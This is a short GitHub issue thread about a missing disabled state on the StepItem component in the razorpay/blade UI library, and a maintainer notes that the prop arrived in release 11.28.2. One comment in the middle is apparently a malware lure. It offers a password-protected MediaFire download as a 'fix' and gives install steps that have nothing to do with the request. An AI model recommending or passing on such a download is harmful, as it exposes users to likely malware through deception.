### ISSUE TITLE
StepItem disabled state missing

### ISSUE THREAD

**Issue by AnkitaBagale** [razorpay/blade#2338]
There is a capability to add onClick prop, which renders the StepItem as button. But it should be disabled based on some conditions in my design.
Hence, need isDisabled prop for this case.

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by saurabhdaware** [comment]
It was added in this release https://github.com/razorpay/blade/releases/tag/%40razorpay%2Fblade%4011.28.2
